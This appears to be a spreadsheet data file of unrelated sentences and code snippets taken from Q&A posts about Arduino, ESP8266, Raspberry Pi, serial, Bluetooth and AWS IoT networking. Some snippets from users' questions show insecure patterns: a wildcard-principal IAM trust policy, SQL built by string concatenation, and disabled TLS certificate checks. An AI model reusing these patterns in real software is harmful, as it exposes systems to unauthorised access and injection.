        /* Acknowledge the interrupt */
        /* Write PIN_ACK to the EVENT_STATUS_OFFSET register */
        LDR R14, [R8, #DATA_ACK_OFFSET]     /* Load Address */
        MOV R12, #PIN_ACK
        STR R12, [R14, #0]
        LDR R14, [R8, #0]   /* Load Address */
        LDR R14, [R14, #0]  /* Load Value */
        ADD R14, R14, #1
        LDR R12, [R8, #0]   /* Load Address */
        STR R14, [R12, #0]
        /* return from fiq */
        subs  pc, lr, #4
pulse_logger_fiq_handler_end:
I then toggle the line 20 times (using another GPIO) but at the end of the run wr_p == 1.</t>
  </si>
  <si>
    <t>Typically in this situation, you would configure the master in API mode so you would get "Receive Explicit" frames with source addressing information, and could send with the "Transmit Explicit" frame type, and include addressing information in your frames.</t>
  </si>
  <si>
    <t>The value that I receive from the Arduino and then stored in the database is this (com.panamahitek.PanamaHitek_Arduino@568fbcdf) and when I compare the value of the fingerprint scanned with the column that stores the fingerprint value it says that no match was found.</t>
  </si>
  <si>
    <t>A much better solution would be to utilize an serial port barcode scanner, setup a thread to listen to the serial port and then do your processing.</t>
  </si>
  <si>
    <t>Stop Ransomware Mid-Flight
Techopedia explains Unknown Host
An unknown host message is generated when a user attempts to ping a host name without a configured DNS resolution.</t>
  </si>
  <si>
    <t>Alternatively, you're just using an invalid multicast address (looking at https://www.iana.org/assignments/ipv6-multicast-addresses/ipv6-multicast-addresses.xhtml#ipv6-scope it doesn't appear that addresses starting with  are valid for ipv6 multicast addresses).</t>
  </si>
  <si>
    <t>It can be armed and disarmed using a remote, and I want a green led to be on when it is disarmed, and a red led to be on when it is armed.</t>
  </si>
  <si>
    <t>If it says Connection refused, it is likely that the other host is reachable, but there is nothing listening on the port.</t>
  </si>
  <si>
    <t>The error is exactly the same in both for the bluetoothctl, it is as follows:
If I connect to the SPRK+ before pairing, it succeeds and changes to
Then further attempt to pair results in
[SK-3966]# pair
Attempting to pair with
Failed to pair: org.bluez.Error.AuthenticationFailed
[CHG] Device F7:AF:AF:64:39:66 ServicesResolved: no
[CHG] Device F7:AF:AF:64:39:66 Connected: no
Attempt to connect using the regular bluetooth settings screen in Ubuntu 14.04 results in Setting up "SK-3999" failed.</t>
  </si>
  <si>
    <t>I'm under the impression that good serial communication protocol should include a handshake, send data and wait for response, receive data and send response, data clocking, etc.</t>
  </si>
  <si>
    <t>What if you change the loop to  and inside loop check if the key is available using Console::KeyAvailable, if the key is not available, send message stop, if it is available, read the key and check which key it is, if it is UpArrow, send message forward.</t>
  </si>
  <si>
    <t>Is there any way to "middle man" incoming packets to an open COM port and detect what packets are being sent?</t>
  </si>
  <si>
    <t>The steps on debugging any I2C device
1.Verify your hardware connection is ok (especially SCL and SDA)
2.Verify that does your API uses the slave address correctly as expected by the i2c slave ie;HMC3855L and after sending slave address verify you're receiving ACK signal as response.</t>
  </si>
  <si>
    <t>This role has an open trust relationship:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}
However, in my client code (browser), I can't connect to IoT and I receive the following error:
WebSocket connection to 'wss://my-endpoint.iot.us-east-1.amazonaws.com/mqtt?X-Amz-Algorithm=AWS4-HSignature=my-signature' failed: Error during WebSocket handshake: Unexpected response code: 403
Trying a simplified test, I've used EC2, but received another permission error.</t>
  </si>
  <si>
    <t>First of all, you should move your pin setup in Setup(), there is no need to reinitialize pin i/o setup on every loop.</t>
  </si>
  <si>
    <t>The sketch starts in WIFI_AP mode (for device testing purposes), but if a network is discovered after an asynchronous WiFi scan, the call back code disconnects the WiFi and then creates a connection in WIFI_AP_STA mode (acting as a secondary network access point).</t>
  </si>
  <si>
    <t xml:space="preserve">
I have to connect with HOST or REST API with HTTPS Secure connection with certificate after successful connection perform POST,GET,PUT and Delte, etc...
Any one can help me to create HTTPS secure connection with HOST using Certicate.</t>
  </si>
  <si>
    <t>So this:
content_type='application/json'
canonical_headers = 'content-type:' + content_type + '\n' + 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n'
signed_headers = 'content-type;host;x-amz-date'
And this:
canonical_headers = 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n'
signed_headers = 'host;x-amz-date'
Both work for me.</t>
  </si>
  <si>
    <t>My guess would be that you need to add a delay after closing the port because it will take some time for the computer to detect the bootloader, enumerate it, and create the serial ports for it.</t>
  </si>
  <si>
    <t>This is the database update function:
#This function connects to database and updates the value in the selected column in the selected table to the set new value
def dbupdate(dbcolumn,dbtable,newvalue):
    try:
        db = MySQLdb.connect("localhost","user","password","weather")
        cursor = db.cursor()
        sql = "UPDATE "+dbtable+" SET "+dbcolumn+" = "+newvalue
        try:
            cursor.execute(sql)
            db.commit()
        except:
            db.rollback()
        cursor.close()
        db.close()
        return
    except:
        print("Database connection failed")
The database column is set to Decimal(5,2) and as mentioned, the function works well elsewhere.. 
Can anyone see something I can't?</t>
  </si>
  <si>
    <t>[bluetooth]# scan off
[bluetooth]# trust &lt;Device MAC&gt;
[bluetooth]# pair &lt;Device MAC&gt;
[bluetooth]# connect &lt;Device MAC&gt;
If you still see, 
Attempting to connect to 44:D8:84:02:A3:17
Failed to connect: org.bluez.Error.Failed
Start the pulseaudio,
pulseaudio
pactl load-module module-bluetooth-discover
Go back to bluetoothctl and try connecting again.</t>
  </si>
  <si>
    <t>I would like to know how to code, using python whenever the sensor is detected, a led will light up and whenever it is not detected, the led would not light up.</t>
  </si>
  <si>
    <t>So, my code looks like this:
Button HTML code
Javascript
In this case I get this error:
WebSocket connection to 'ws://xxxxxxxxx.iot.eu-west-1.amazonaws.com:443/mqtt' failed: Error during WebSocket handshake: net::ERR_INVALID_HTTP_RESPONSE
Can anyone help me how to reach it?</t>
  </si>
  <si>
    <t>If application receive that ID - it will be confirmation, that port number/name is correct and I my connection is established.</t>
  </si>
  <si>
    <t>Once the connection has been established, data that goes over the connection is encrypted on send and decrypted on receive.</t>
  </si>
  <si>
    <t>Both localhost IPv6 connections (the default) and all connections from other computers will receive the connection refused error.</t>
  </si>
  <si>
    <t>I am not able to establish a successful connection between my Pi and the fingerprint sensor module.</t>
  </si>
  <si>
    <t>Just make sure to check the output voltage of your regulator before you connect it to the 5V pin on the Arduino - anything more than 6V on that pin will likely smoke something, since you are bypassing the onboard regulator and all of the protection circuitry that goes with it.</t>
  </si>
  <si>
    <t>Using AES library i am trying to send encrypted data from arduino side to raspberry pi side.The encrypted data that is being printed on the arduino serial monitor is not the same as what is being printed on the raspberry side.</t>
  </si>
  <si>
    <t>In your Python code, the first character of the data being read from the serial port is  in which case json.dumps() will throw the exception shown:
The data read from the serial port looks corrupted - it should be 14 bytes long (6 lat + 6 lon + ',' + '\n'), however, the data printed shows that it is far longer than that.</t>
  </si>
  <si>
    <t>Featured tunneling mode which allows also special tunneling such as
  UDP to TCP, with the possibility of specifying all network parameters
  (source port/interface, listening port/interface, and the remote host
  allowed to connect to the tunnel.</t>
  </si>
  <si>
    <t>Besides, I also wasn't able to find a way in the internet for my ESP8266 be connected to Proxy Wifi Connection.</t>
  </si>
  <si>
    <t>edit: I just noticed that when the python script sends the data, then the debug serial port I am using sends corrupted data.</t>
  </si>
  <si>
    <t>I'm trying to send udp packet from python server to arduino client by broadcast IP('255.255.255.255').The python server is sending the packet fine but the arduino can't recieve the packet at all even after disabling the windows firewall
server code :
the packet size is received is 0 and it should have the size and contents</t>
  </si>
  <si>
    <t>Depending on how you've installed MySQL, you may not have a user that listens for non-local connections, incoming MySQL connections may be blocked at the firewall, or your MySQL server may not listen for incoming network connections.</t>
  </si>
  <si>
    <t>If yes, the socket code seems wrong to me:
You must remember that TCP requires connection tracking, so you can't immediately stop a socket, it has to linger a bit for acknowledging packets sent.</t>
  </si>
  <si>
    <t>authCommand = 'AUTH LOGIN\r\n'
ssl_clientSocket.write(authCommand.encode())
auth_recv = ssl_clientSocket.readline()
print(auth_recv)
if auth_recv[:3] != b'334':
    print('334 reply not received from server')
print("Sending username / password")
# Send username and print server response.</t>
  </si>
  <si>
    <t>But, after establishing successful connection with Azure server, I am unable to establish TLS handshake with the server.</t>
  </si>
  <si>
    <t>You could confirm what is going on with two tools:
- netstat (or similar) would tell you if the server is accumulating connections in CLOSE_WAIT or TIME_WAIT
- Wireshark would let you see if the server is trying to close the connection and not being acknowledged by the Arduino.</t>
  </si>
  <si>
    <t>Clients need not know the address of the servers on the subnet, they discover them through broadcast messages on well-known UDP ports.</t>
  </si>
  <si>
    <t>You will be able to get a DHCP address by plugging it directly into your DHCP server, but you will not get an address if the shield is connected to a switch.</t>
  </si>
  <si>
    <t>...
system "stty 115200 ignbrk -brkint -icrnl -imaxbel -opost -onlcr -isig -icanon -iexten -echo -echoe -echok -echoctl -echoke &lt; $dev"
spawn -open [ open $dev r+ ]
send "login $password\r"
expect {
  -re "Login OK\r\n(by|si|man)&gt;" { send "$command\r" }
  -re "Login DENIED*" { exit 1 }
  timeout {
    puts "\nTimeout"
    close
    exit 1
  }
}
...</t>
  </si>
  <si>
    <t>The drawbacks are that UDP is unreliable - you can't be certain your message was received - and you'd need a lot more code to receive a response, if you want one, and you'd need to build a reliability mechanism (retransmit if no answer received, detect retransmissions in case the answer was dropped) if you care about that.</t>
  </si>
  <si>
    <t>R:/192.168.0.105:59927] UNREGISTERED
With my understanding this means that the TCP packets are indeed received but in the faulty cases the IO thread from Netty is waiting to read the TCP data but does never continue...</t>
  </si>
  <si>
    <t>There is a way to have a "error prone" packet sniffing with nRF24L01 explained here: http://yveaux.blogspot.nl/2014/07/nrf24l01-sniffer-part-1.html
A receiver (or a transceiver in this case) that supports promiscuous mode and therefore allows for packet sniffing is esp8266 http://wp.dejvino.com/2015/02/how-to-use-an-esp8266-a-jumpstart-tutorial/</t>
  </si>
  <si>
    <t>The purpose of our project is to sniff for specific MAC/IP-addresses so we can use the MAC/IP-addresses to turn off or on the alarm system.</t>
  </si>
  <si>
    <t>Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.\n' }
When I execute that script directly in console it works.</t>
  </si>
  <si>
    <t>In my arduino code i can encrypt/decrypt using de AESlib of DavyLandman https://github.com/DavyLandman/AESLib and the sample code that he prepared
uint8_t key[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p'};
        char data[] = "0123456789012345"; //16 chars == 16 bytes
        aes128_enc_single(key, data);
        Serial.print("encrypted:");
         Serial.println(data);
        aes128_dec_single(key, data);
        Serial.print("decrypted:");
         Serial.println(data); 
and in android i also can encrypt/decrypt using an example founded on stackoverflow with a class AESHelper:
But the problem is that i can't decrypt on arduino encrypted data from android and vice versa.</t>
  </si>
  <si>
    <t>I configured net mask as 255.255.255.240 and when I do 
it prints properly like 
but, ifconfig of my computer (and other ESP8266) connected to it shows netmask as 255.255.255.0.</t>
  </si>
  <si>
    <t>You must have ensured the email address@hotmail.co.uk exists, so try using any other provider's email address and check.</t>
  </si>
  <si>
    <t>Connection refused typically means no service is listening on the target IP address and port.</t>
  </si>
  <si>
    <t>As was stated before you need to set your BT module into HID mode (send the command  from a serial connection or set GPIO11 high on starting the module).</t>
  </si>
  <si>
    <t>debug1: ssh_ecdsa_verify: signature correct
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: Roaming not allowed by server
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Offering RSA public key: /home/userServer/.ssh/id_rsa
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: password
userBackup@piBackup.fr's password: 
I have noted that in the last lines, he says "Offering RSA public key: /home/userServer/.ssh/id_rsa" so I tried with my public key instead, but nothing changed.</t>
  </si>
  <si>
    <t>Each packet contains:
A label which uniquely identifies it
The IP address of its origin and destination
A sequence number (for sorting)
A checksum (for error checking
The process of sending and receiving packets is known as "packet-switching."</t>
  </si>
  <si>
    <t>By sending "AT+CREG=0" one can disable network registration code (which is your case)   
By sending "AT+CREG=1" one can enable network registration
By sending "AT+CREG=2" one can enable network registration code with
location information (location area code and cell ID)
Options 2. and 3. will also automatically emit +CREG messages upon modem boot/network change.</t>
  </si>
  <si>
    <t>What I tried:
-Making Apache listening to other ports (in case my ISP was blocking port 80, which apparently is not)
-Uninstalling/re-installing no-ip
-Deleting all the rules and accepting all inbound requests in my firewall (iptables)
Nothing seems to make it work, I just can't reach my website from outside my home network (locally it displays with no problem)
One odd thing here is that using my NO-IP domain I CAN ACCESS SSH on port 22, so my guess is:
ISP is blocking port 80 (but I tried other ports like 8899, no luck
either) 
Something is wrong with Apache configuration?</t>
  </si>
  <si>
    <t>#uname = base64.b64encode((username).encode())
uname=b'Base64EncryptedUser=='
pword=b'Base64EncryptedPassword'
print(str(uname))
ssl_clientSocket.write(uname)
ssl_clientSocket.write('\r\n'.encode())
uname_recv = ssl_clientSocket.readline()
print(uname_recv)
if uname_recv[:3] != b'334':
    print('334 reply not received from server')
# Send password and print server response.</t>
  </si>
  <si>
    <t>it can be used for ssh and serial port client
hardware:
you can use regular relays for switching ( don't forget diode across the coil of the relay)
and your mux multiplexer,
wire mux data pins to arduino to 3 digital IO's.</t>
  </si>
  <si>
    <t>2) Network discovery
I don't know if arduino is capable to do it, but, the idea is to make arduino listen on a specific UDP port, like 4444, on any address.</t>
  </si>
  <si>
    <t>If you don't specify the the IP addresses or host addresses with ports, you can use cmdlet $env:ASPNETCORE_URLS="http://0.0.0.0:5000" to change the default setting, then run the web server and it will be inaccessible from other devices.</t>
  </si>
  <si>
    <t>Connection refused means that the target host SERVER_IP is not running an sshd daemon and/or is not listening to port 22.</t>
  </si>
  <si>
    <t>So
Received Address: b'\x00\x13\xa2\x00Aga\xf8'
Address (Decoded by Manufacturer): 00 13 A2 00 41 67 61 F8
I have been trying to decode this using address.decode('utf-8') but always receive a UnicodeDecodeError at \xa2 as an invalid start byte.</t>
  </si>
  <si>
    <t>I've seen code to enumerate the devices, find the IP Addresses and MAC Addresses, but what else can I find?</t>
  </si>
  <si>
    <t>Android tries to connect to the Arduino
Arduino sees the request and sends a random string to the Android device
The Android encrypts the string with a shared secret key and sends it back to the Arduino
The Arduino decrypts the encrypted string and verifies it matches the original it sent if it does it it goes ahead and connects/continues with locking or unlocking.</t>
  </si>
  <si>
    <t>I found the answer when I started looking at how serial devices could open a login terminal, and arrived at the getty tool.</t>
  </si>
  <si>
    <t>So you should check the application is actually listening to that port or also if the Arduino is running any firewall preventing connection (I doubt this is the case).</t>
  </si>
  <si>
    <t>What you can see there:
Request is not being sent =&gt; most lickely missconfiguration on source
Request is being sent and answer not =&gt; most lickely missconfiguration on dest
Both are being sent, but answer is not recieved =&gt; missconfiguration of firewall on source or routing problem (probably not your case)
If everything above works and is as it should, you then have to focus on the service running on the Pi.</t>
  </si>
  <si>
    <t>Using this code to read packets, the following criteria (which are defined by the protocol) are guaranteed:
The packets begins with [66 77]
The packet contains 32 bytes
The start condition [66 77] will never occur in the body of the packet.</t>
  </si>
  <si>
    <t>Requesting permission works, but as soon as I try to actually open the serial connection, I see a Java-exception in the : java.io.IOException: Error queueing request
This means after I call serial.open neither the success, not the error-callback is called.</t>
  </si>
  <si>
    <t>A sample program that i wrote is for example:
At this time i can not provide a proper connection diagram (will when i have a chance), but the arduino MEGA 2560 is connected with 3 wires to the barcode scanner, A Tx (pin 50), Rx (pin 51) and GND
background info on transmitted data:
startbit: 0x02
stopbit: 0x03
Ultimate goal: 
Scanner scans barcode, arduino reads the datastream and sends a output when it recognizes a code.</t>
  </si>
  <si>
    <t>I have checked this thread but didn't work for me IBM Bluemix: Device connected, but 'IBMIoT: Error: Connection refused: Not authorized' message keeps popping up
I have added one device on Bluemix, see below snapshot
I am trying to debug whatever message is being published from my ESP8266 which is connected to the IBM Bluemix
I am trying to debug this published message in node red debug console, there it is displaying below error:
msg : string[41]
  "Error: Connection refused: Not authorized"
Can anyone help me what I am missing or doing wrong?</t>
  </si>
  <si>
    <t>I wrote this script for my RPi3 (running CentOS 7), which is checking if someone is connected to RPi via SSH and if so, it starts another python script to turn on green LED (Blinkt!).</t>
  </si>
  <si>
    <t>If your serial is a real serial, then you could connect via:
if your serial is a serial over USB then:
However in both cases you have to be root, or change permissions on the device.</t>
  </si>
  <si>
    <t>Basically, clicking this button opens the serial port and listens for 1 of 2 things, the enroll/verify mode (physical buttons on circuit, which after pressed send the strings "Enrollment" or "Verification" to the Serial).</t>
  </si>
  <si>
    <t>Full Code for info:
#include &lt;WiFi.h&gt;
#include &lt;WiFiUdp.h&gt;
#include &lt;cstring&gt;  //For the string functions
const char* wifi_name = "SSID";          // Your Wifi network name here
const char* wifi_pass = "password";     // Your Wifi network password here
WiFiServer server(80);                      // Server will be at port 80
// IP address to send UDP data to.</t>
  </si>
  <si>
    <t>When I scan the ports open on the pi from my laptop I only see the ssh and vnc ports, but when running the netstat on the pi both ports appear to be in listening state.</t>
  </si>
  <si>
    <t>10.0.14393.0):
Start remote debugger at RPi and setup VS at address (without Authentication mode)
Start debugging (remote device, ARM)
I get this error message:
The project "Test" needs to be deployed before it can be started.</t>
  </si>
  <si>
    <t>We tried multiple libraries and we are close, but now we have an "invalid handshake" error when trying to upgrade our http connection to a websocket connection.</t>
  </si>
  <si>
    <t>So my actual problem is, with time.sleep I block the programm for the time its sleeping, thus i cant disarm the system during alarm mode.</t>
  </si>
  <si>
    <t>It's not an initial WiFi connection problem - the device IP is recognized as a port, the password is verified if I use one and the initial connection is made.</t>
  </si>
  <si>
    <t>Here is the packet:
7E 00 10 17 00 00 00 00 00 00 00 FF FF FF FE 00 43 42 01 67
Then, when all your devices receive this packet, they should answer to the coordinator with a Node Identification Indicator, which contains their 16-bit and 64-bit address.</t>
  </si>
  <si>
    <t>However, if your USB serial device (ie Raspberry PI) exposes individual UART TX &amp; RX pins, you can communicate with it using the UART Peripheral API.</t>
  </si>
  <si>
    <t>Issues:
byte array is being successfully sent to the ADK from the phone, verified by monitoring serial port of arduino board
High &amp; low signal is being properly handled in the arduino code (same verification).</t>
  </si>
  <si>
    <t>The certificates get renewed after 60 days and you can only connect to port 1883 via the localhost and the other ports (8883 and 8083) are open but can only be accessed using TLS version 1.2 and for the latter also using websockets.</t>
  </si>
  <si>
    <t>Use it like this:
with quitting_smtp_cm(smtplib.SMTP('smtp.gmail.com', 587)) as s:
    s.ehlo()
    s.starttls()
    s.ehlo()
    s.login('address','passw')
    s.sendmail(sender, recipients, composed)
Note that it'll close the connection for you.</t>
  </si>
  <si>
    <t>The Enable flag is toggled when you press the button and the sensor output is printed as long as Enable stays True.</t>
  </si>
  <si>
    <t>Next, I defined the routing table to reply incoming packets on same network interface...
echo 100 public &gt;&gt; /etc/iproute2/rt_tables
ip rule add from 141.41.241.68/32 table public
ip route add default via 141.41.241.65 dev eth0 table public
result:
Internet on the Raspberry Pi (eth1): works fine
access to Raspberry Pi over Internet (via eth0):
SSH (TCP): works fine
Apache web server (TCP): works fine
NTP time server (UDP): doesn't work
and 'iptraf-ng' shows:
TCP Connections (Source Host:Port)  Iface
--------------------------------------------------
141.41.241.68:80                    eth0
80.187.108.126:52083                eth0
141.41.241.68:80                    eth0
80.187.108.126:52084                eth0
141.41.241.68:80                    eth0
80.187.108.126:52085                eth0
141.41.241.68:80                    eth0
80.187.108.126:52086                eth0
141.41.241.68:80                    eth0
80.187.108.126:52087                eth0
UDP Connections
--------------------------------------------------
UDP (76 bytes) from 80.187.108.126:28599 to 141.41.241.68:123 on eth0
UDP (76 bytes) from 192.168.0.101:123 to 80.187.108.126:28599 on eth1
We see:
On TCP: now it works correctly
On UDP: same problem :(
What can I do to send UDP responses over the correct interface (eth0)?</t>
  </si>
  <si>
    <t>Sometimes it can take a second for the Arduino and computer to establish the Serial handshake, especially at 9600 baud.</t>
  </si>
  <si>
    <t>Code Validation
Since most email clients dont follow web standards and there are no email-specific standards in place, properly coded HTML emails will not pass HTML validating because, if coded properly, nearly all of the code within an HTML email is likely to be comprised of depreciated elements.</t>
  </si>
  <si>
    <t>You can use the following simple program to test (just fill in the WIFI SSID, PASSWORD, and the WRITE_KEY):
It simply logs when the device is started (or restarted) and also starts a timer so that the device can not sleep.</t>
  </si>
  <si>
    <t>Everything seems to check out fine, but the greengrass daemon fails to start - error is:
Greengrass deamon xx failed to start
Failed to create overlay fs for container nosysRootfs operation not permitted
I had the same core setup as a non-Docker container, so the certs and config.json file should be correct.</t>
  </si>
  <si>
    <t>I got the IP address and mask and gateway address for my esp8266 but I need only the gateway address.</t>
  </si>
  <si>
    <t>So far ESP32 can send the device name and MAC address but somehow, we have not able to send UUID data.</t>
  </si>
  <si>
    <t>This are the codes to send and receive data:
Send data via IR:
Receive data via IR:</t>
  </si>
  <si>
    <t>Or you can establish a TCP connection with AWS and then use a lib to handshake and send data with TLS 1.2 protocol.</t>
  </si>
  <si>
    <t>Robots do not have intelligence, they are sending sensor values to PC which computes the sensors values and sends back result to robots.</t>
  </si>
  <si>
    <t>If you know in advance the frames but not the activation times, send and buffer the frames and send just activation codes at appropriate times.</t>
  </si>
  <si>
    <t>token
 struct Glove glove = { .index.pin = 20, .middle.pin = 22, .ring.pin = 24, .thumb.pin = 26};
                                                                           ^
exit status 1
expected primary-expression before '.'</t>
  </si>
  <si>
    <t>Problem :
I have a few sensors that are required to receive the data from Raspberry Pi via BLE(Peripheral), the mechanism to receive the data is very mechanical in nature :
This is what happens in the one secure data transfer from Sensor to Peripheral (R Pi):
Sensor encrypts a random one-time session key using Public Key of Peripheral Device which exposes a Read Characteristic and advertises its Public Key there.</t>
  </si>
  <si>
    <t>The code for Serial.c is similar to what is found in the devdot tutorial, and I think I am sucessfully opening the serial port because I am getting this message in the console:
Aug 18 19:33:34 3GS KegCop[520]: The serial data is 16
How would I read the RFID badge number being scanned on the Parallax reader?</t>
  </si>
  <si>
    <t>So your code would look something like this:
The three important changes are:
- defining client to be WiFiClientSecure rather than WiFiClient
- adding a call to client.verify after the connection succeeds
- providing a constant server finger print to compare with
The fingerprint I provided won't work with your server.</t>
  </si>
  <si>
    <t>If I have understood properly, Peripherial can not end connection or start connection and peripherial do not allow simultaneous connections.</t>
  </si>
  <si>
    <t>With the number of available pins, you would need to trigger 3 ultrasonic sensors per pin (2 pins for triggering + 6 pins for reading the echo).</t>
  </si>
  <si>
    <t>I would guess switching on the AC device either causes electrical interference (the spark on the relay can be quite bad) which breaks your WIFI signal, or interrupts the power supply to the ESP8266, which can cause WIFI to fail.</t>
  </si>
  <si>
    <t>Assuming your  is pointing to Base-Address 0x5000 0000 and defined as aligned 8bit array then your Pin-Port addressing/masking is wrong.</t>
  </si>
  <si>
    <t>Device addressing will target an individual device, tag addressing will target all devices that have a particular tag, and broadcast addressing addressing will target all devices.</t>
  </si>
  <si>
    <t>In the worst cases, packet loss can cause severe mutilation of received data, broken-up images, unintelligible speech or even the complete absence of a received signal.</t>
  </si>
  <si>
    <t>6- Phone initiates a direct connection with the device to send wireless configuration information (ssid and password for the access point)
7 - Device saves this information, resets into normal operation mode
8 - Device connects to internet
9 - Device services are still available in the local network  
-- edit -- 
Code will run on esp32 or esp8266, so compatible c or arduino libraries are ok.</t>
  </si>
  <si>
    <t>You can scan your network for points with ports 5555/5554 open, for example,
will scan in range 2-100 for any IP addresses with those ports open.</t>
  </si>
  <si>
    <t>(In case you are in the Wifi LAN)
If the local IP address fails, try again your Dyn DNS (in case the user is a real user with real communication problems)
(repeat until the connection is successful)
You can also identify your testing devices (using Settings.Secure.ANDROID_ID, or the IMEI) and use the local IP only for them.</t>
  </si>
  <si>
    <t>The ESP8266's code:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;WiFiClient.h&gt;
#include &lt;ESP8266WebServer.h&gt;
#include &lt;ESP8266mDNS.h&gt;
#include &lt;ArduinoJson.h&gt;
#include &lt;ESP8266HTTPClient.h&gt;
const char* ssid = "ssid";
const char* password = "password";
bool isOn = false;
const int redPin = 0;
const int bluePin = 1;
const int greenPin = 2;
struct Color {
  int R;
  int G;
  int B;
};
bool isInSetupMode = false;
Color* bulbColor;
ESP8266WebServer server(80);
void handleRoot() {
    String response = "&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;";
    response+= "Lightbulb is ";
    response+= ((isOn == 1) ?</t>
  </si>
  <si>
    <t>Common problems which are not programming-related include
Port 25 is blocked and you get 
Relay access denied
How to send emails and avoid having them being classified as spam
Off-topic: "My email isn't spam" on meta.stackoverflow.com
Related Tags
mime pop3 smtp imap mailto etc</t>
  </si>
  <si>
    <t>It looks like this:
const net = require('net');
const fs = require('fs');
const https = require('https');
var options = {
    key:    fs.readFileSync('ssl/key.pem'),
    cert:   fs.readFileSync('ssl/cert.pem'),
    requestCert: false,
    rejectUnauthorized: false
};
//pass in your express app and credentials to create an https server
const httpsServer = https.createServer(options);
      httpsServer.listen(9030);
/**
 *  server
 */
let connections = {};
let WebSocketServer = require('ws').Server;
let wss = new WebSocketServer({server: httpsServer}),
wss.on('connection', function(ws) {
    ...
}
When starting the server with node server.js and start my AngularJS app I get the error message:
WebSocket connection to 'wss://IPADDRESS:9030/' failed: Error in connection establishment: net::ERR_CERT_AUTHORITY_INVALID
What can I do to get it to work?</t>
  </si>
  <si>
    <t>If the validation fails the UNO starts to blink the onboard LED on PIN13.</t>
  </si>
  <si>
    <t>");
    }
    WiFi.begin(ssid, password);
    delay(1000);
    int k = 0;
    while(WiFi.status() != WL_CONNECTED &amp;&amp; k&lt;20) {
        delay(1000);
        k++;
        logOutput("Connecting to WiFi");
    }
    if(WiFi.status() == WL_CONNECTED) {
        logOutput((String)"Connected to: " + ssid + " with IP: " + WiFi.localIP().toString());
    } else {
        logOutput("Couldn't connect to WiFi !</t>
  </si>
  <si>
    <t>ESP8266 sketch: connect to WiFi network, receive sensor data from Serial, send via WiFiClientSecure to the cloud.</t>
  </si>
  <si>
    <t>Especially the cellular connection and authentication should be adoptable to BBB, once the serial connection is established.</t>
  </si>
  <si>
    <t>I think, you must first change IP address on your Pi to same subnet and mask what your sensor has.</t>
  </si>
  <si>
    <t>I am trying to use an esp8266 to find what ip addresses are registered on the same subnet and their mac addresses for a home automation  project.</t>
  </si>
  <si>
    <t>Of my understanding the reason is that the device was not actually disconnected (despite that it shows disconnected status) or some connection information is still pending, which prevents it to be recognized on a new advertisement.</t>
  </si>
  <si>
    <t>This leads me to believe that the device is connected but is not sending or receiving information and I am unsure as to how I can configure this or even really check if there is communication occurring between the tower and my computer.</t>
  </si>
  <si>
    <t>The reason why  and all posts say to use &gt; is because you're supposed to use a dedicated lock file, typically in /var/lock:
This additionally fixes you sending your email regardless, before you ever check the lock, and aborts new emails instead of queueing them all up.</t>
  </si>
  <si>
    <t>debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_rsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_rsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_dsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_dsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_ecdsa type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_ecdsa-cert type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_ed25519 type -1
debug1: key_load_public: No such file or directory
debug1: identity file /Users/annazotova/.ssh/id_ed25519-cert type -1
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_7.3
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.3
debug1: match: OpenSSH_7.3 pat OpenSSH* compat 0x04000000
debug1: Authenticating to 192.168.0.3:22 as 'pi'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256@libssh.org
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server-&gt;client cipher: chacha20-poly1305@openssh.com MAC:  compression: none
debug1: kex: client-&gt;server cipher: chacha20-poly1305@openssh.com MAC:  compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:LPy5oyssyqW7GgMg0P3ygylRK1bSAxTbijXYWIcpnNc
debug1: Host '192.168.0.3' is known and matches the ECDSA host key.</t>
  </si>
  <si>
    <t>/etc/ppp/options-mobile
Create the /etc/ppp/peers directory:
$ mkdir /etc/ppp/peers
$ cd /etc/ppp/peers
/etc/ppp/peers/mobile-auth
file /etc/ppp/options-mobile
user "your_usr"
password "your_pass"
connect "/usr/sbin/chat -v -t15 -f /etc/ppp/chatscripts/mobile-modem.chat"
/etc/ppp/peers/mobile-noauth
file /etc/ppp/options-mobile
connect "/usr/sbin/chat -v -t15 -f /etc/ppp/chatscripts/mobile-modem.chat"
Create the /etc/ppp/chatscripts directory:
$ mkdir /etc/ppp/chatscripts
/etc/ppp/chatscripts/mobile-modem.chat
ABORT 'BUSY'
ABORT 'NO CARRIER'
ABORT 'VOICE'
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
ABORT 'DELAYED'
REPORT CONNECT
TIMEOUT 6
'' 'ATQ0'
'OK-AT-OK' 'ATZ'
TIMEOUT 3
'OK' @/etc/ppp/chatscripts/pin
'OK\d-AT-OK' 'ATI'
'OK' 'ATZ'
'OK' 'ATQ0 V1 E1 S0=0 &amp;C1 &amp;D2 +FCLASS=0'
'OK' @/etc/ppp/chatscripts/mode
